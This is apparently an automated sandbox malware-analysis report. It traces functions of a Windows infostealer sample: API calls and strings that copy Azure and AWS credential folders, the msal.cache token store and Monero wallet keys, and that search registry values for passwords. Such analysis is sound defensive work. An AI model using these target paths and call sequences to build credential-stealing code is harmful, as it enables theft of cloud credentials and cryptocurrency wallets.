Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: @i$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-750151619
Opcode ID: 51b13efec094fe7f694164bce246fdd2f2962bf361ffd977dde6fb5b5e0df369
Instruction ID: 0456055cb932df795fac92b435d3c68fe80c916d3bf4e807d9b93d634a0e9458
Opcode Fuzzy Hash: 51b13efec094fe7f694164bce246fdd2f2962bf361ffd977dde6fb5b5e0df369
Instruction Fuzzy Hash: 1AE132739106049ACB16FBB0FD52EEE7739AF54340F50852AF4065A291EF346F09DB92

Function 003D8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

RegOpenKeyExA.KERNEL32(00000000,00EBAB60,00000000,00020019,00000000,003E05B6), ref: 003D83A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003D8426
wsprintfA.USER32 ref: 003D8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 003D847B
RegCloseKey.ADVAPI32(00000000), ref: 003D848C
RegCloseKey.ADVAPI32(00000000), ref: 003D8499

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Strings

?, xrefs: 003D837A
%s\%s, xrefs: 003D844D
- , xrefs: 003D85A3

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 64b627a4e2be6b2f77b436930dab535af49d674fc00f0e253ea8dc397547011c
Instruction ID: 392c720a10fdf6a8dd1e6477ab310b1e4b4f446e2f6fd5e91aad1e3e946b7420
Opcode Fuzzy Hash: 64b627a4e2be6b2f77b436930dab535af49d674fc00f0e253ea8dc397547011c
Instruction Fuzzy Hash: ED811D72950218ABDB29DF50DD91FEA77B9FF08700F008299E509A6280DF71AB85CF95

Function 003D4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003D8E0B

lstrcat.KERNEL32(?,00000000), ref: 003D4DB0
lstrcat.KERNEL32(?,\.azure\), ref: 003D4DCD

Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D492C
Part of subcall function 003D4910: FindFirstFileA.KERNEL32(?,?), ref: 003D4943

lstrcat.KERNEL32(?,00000000), ref: 003D4E3C
lstrcat.KERNEL32(?,\.aws\), ref: 003D4E59

Part of subcall function 003D4910: StrCmpCA.SHLWAPI(?,003E0FDC), ref: 003D4971
Part of subcall function 003D4910: StrCmpCA.SHLWAPI(?,003E0FE0), ref: 003D4987
Part of subcall function 003D4910: FindNextFileA.KERNEL32(000000FF,?), ref: 003D4B7D
Part of subcall function 003D4910: FindClose.KERNEL32(000000FF), ref: 003D4B92

lstrcat.KERNEL32(?,00000000), ref: 003D4EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 003D4EE5

Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D49B0
Part of subcall function 003D4910: StrCmpCA.SHLWAPI(?,003E08D2), ref: 003D49C5
Part of subcall function 003D4910: wsprintfA.USER32 ref: 003D49E2
Part of subcall function 003D4910: PathMatchSpecA.SHLWAPI(?,?), ref: 003D4A1E
Part of subcall function 003D4910: lstrcat.KERNEL32(?,00EBE490), ref: 003D4A4A
Part of subcall function 003D4910: lstrcat.KERNEL32(?,003E0FF8), ref: 003D4A5C
Part of subcall function 003D4910: lstrcat.KERNEL32(?,?), ref: 003D4A70
Part of subcall function 003D4910: lstrcat.KERNEL32(?,003E0FFC), ref: 003D4A82
Part of subcall function 003D4910: lstrcat.KERNEL32(?,?), ref: 003D4A96
Part of subcall function 003D4910: CopyFileA.KERNEL32(?,?,00000001), ref: 003D4AAC
Part of subcall function 003D4910: DeleteFileA.KERNEL32(?), ref: 003D4B31

Strings

Azure\.IdentityService, xrefs: 003D4EEB
\.IdentityService\, xrefs: 003D4ED9
\.azure\, xrefs: 003D4DC1
*.*, xrefs: 003D4E64
*.*, xrefs: 003D4DD8
Azure\.azure, xrefs: 003D4DD3
Azure\.aws, xrefs: 003D4E5F
\.aws\, xrefs: 003D4E4D
msal.cache, xrefs: 003D4EF0

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 77ddea8ae706fab586537dd9a84af3c6f5d3cea799351e2eb118162ce84cef7f
Instruction ID: f54f215337bdfdc88331d9ab9ad23fb0574f2ba191a46cbcb8bfd54aa79f0ee9
Opcode Fuzzy Hash: 77ddea8ae706fab586537dd9a84af3c6f5d3cea799351e2eb118162ce84cef7f
Instruction Fuzzy Hash: 0E41D77AA4031867DB51F770EC47FEE7338AB24700F004554B5856A1C2FEB09BC99B92

Function 003C1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 003C12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003C12B4
Part of subcall function 003C12A0: RtlAllocateHeap.NTDLL(00000000), ref: 003C12BB
Part of subcall function 003C12A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 003C12D7
Part of subcall function 003C12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003C12F5
Part of subcall function 003C12A0: RegCloseKey.ADVAPI32(?), ref: 003C12FF

lstrcat.KERNEL32(?,00000000), ref: 003C134F
lstrlen.KERNEL32(?), ref: 003C135C
lstrcat.KERNEL32(?,.keys), ref: 003C1377

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Part of subcall function 003DA9B0: lstrlen.KERNEL32(?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003DA9C5
Part of subcall function 003DA9B0: lstrcpy.KERNEL32(00000000), ref: 003DAA04
Part of subcall function 003DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003DAA12

Part of subcall function 003DA8A0: lstrcpy.KERNEL32(?,003E0E17), ref: 003DA905

Part of subcall function 003D8B60: GetSystemTime.KERNEL32(003E0E1A,00EB9CC8,003E05AE,?,?,003C13F9,?,0000001A,003E0E1A,00000000,?,00EB8AB0,?,\Monero\wallet.keys,003E0E17), ref: 003D8B86

Part of subcall function 003DA920: lstrcpy.KERNEL32(00000000,?), ref: 003DA972
Part of subcall function 003DA920: lstrcat.KERNEL32(00000000), ref: 003DA982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 003C1465

Part of subcall function 003DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003DA7E6

Part of subcall function 003C99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003C99EC
Part of subcall function 003C99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003C9A11
Part of subcall function 003C99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003C9A31
Part of subcall function 003C99C0: ReadFile.KERNEL32(000000FF,?,00000000,003C148F,00000000), ref: 003C9A5A
Part of subcall function 003C99C0: LocalFree.KERNEL32(003C148F), ref: 003C9A90
Part of subcall function 003C99C0: CloseHandle.KERNEL32(000000FF), ref: 003C9A9A

DeleteFileA.KERNEL32(00000000), ref: 003C14EF

Strings

\Monero\wallet.keys, xrefs: 003C138D
.keys, xrefs: 003C136B
wallet_path, xrefs: 003C1330
SOFTWARE\monero-project\monero-core, xrefs: 003C1335

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 7b256f0f269ec6e2952e3fd2ac2dac81566469ceceffeb3ab55bcaf40dc237c3
Instruction ID: dc89fa7b26c538f83f8a39823ff92190966292b3df7aee745ac2ffe98468f877
Opcode Fuzzy Hash: 7b256f0f269ec6e2952e3fd2ac2dac81566469ceceffeb3ab55bcaf40dc237c3
Instruction Fuzzy Hash: 3C5178B2D5021857CB16FB60ED92FED737CAF54300F404199B60AA6182EF706B85DFA6

Function 003D7500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 003D7542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003D757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D7603
RtlAllocateHeap.NTDLL(00000000), ref: 003D760A
wsprintfA.USER32 ref: 003D7640

Part of subcall function 003DA740: lstrcpy.KERNEL32(003E0E17,00000000), ref: 003DA788

Strings

C, xrefs: 003D754C
:, xrefs: 003D755C
\, xrefs: 003D7560
>, xrefs: 003D764D, 003D7655, 003D761B, 003D7623

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\$>
API String ID: 1544550907-1396938292
Opcode ID: 3ddd0c4eb9e6e08ab222f7cc3679fe721616de435289d762f0c38f4da3c829e4
Instruction ID: 6dc4eea730b7c517fbcd1dac91532b705cd08787dcd9711ea4e96ad4147ee82e
Opcode Fuzzy Hash: 3ddd0c4eb9e6e08ab222f7cc3679fe721616de435289d762f0c38f4da3c829e4
Instruction Fuzzy Hash: 9D41C4B2D44348ABDB11DF94EC45BDEBBB9EF08700F10409AF5096B380E774AA44CBA1

Function 003C75D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 003C72D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 003C733A
Part of subcall function 003C72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003C73B1
Part of subcall function 003C72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003C740D
Part of subcall function 003C72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 003C7452
Part of subcall function 003C72D0: HeapFree.KERNEL32(00000000), ref: 003C7459

lstrcat.KERNEL32(3583D020,003E17FC), ref: 003C7606
lstrcat.KERNEL32(3583D020,00000000), ref: 003C7648
lstrcat.KERNEL32(3583D020, : ), ref: 003C765A
lstrcat.KERNEL32(3583D020,00000000), ref: 003C768F
lstrcat.KERNEL32(3583D020,003E1804), ref: 003C76A0
lstrcat.KERNEL32(3583D020,00000000), ref: 003C76D3
lstrcat.KERNEL32(3583D020,003E1808), ref: 003C76ED
task.LIBCPMTD ref: 003C76FB

Strings

: , xrefs: 003C764E

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: b0a00576b135f955a184587cdca3858fb257699428cefc7fb50b64efb8c867cc
Instruction ID: 4003083a67b668cd836510a5cf2e29087c1fc43322f045e6b935d135d5cc84eb
Opcode Fuzzy Hash: b0a00576b135f955a184587cdca3858fb257699428cefc7fb50b64efb8c867cc
Instruction Fuzzy Hash: 57314C72A40209EFCB06EBF4DC95EFF77BABB44301B145118F502AB290DA35AE46CB51

Function 003D8100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00EBDD78,00000000,?,003E0E2C,00000000,?,00000000), ref: 003D8130
RtlAllocateHeap.NTDLL(00000000), ref: 003D8137
GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 003D8158
__aulldiv.LIBCMT ref: 003D8172
__aulldiv.LIBCMT ref: 003D8180
wsprintfA.USER32 ref: 003D81AC

Strings

@, xrefs: 003D814D
%d MB, xrefs: 003D81A3

Memory Dump Source

Source File: 00000000.00000002.1662498054.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true

Associated: 00000000.00000002.1662458997.00000000003C0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000445000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000047D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004A2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.00000000004DE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.0000000000585000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1662498054.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000007A8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008A3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663178697.00000000008B9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663485193.00000000008BA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663600851.0000000000A51000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1663623096.0000000000A52000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3c0000_file.jbxd

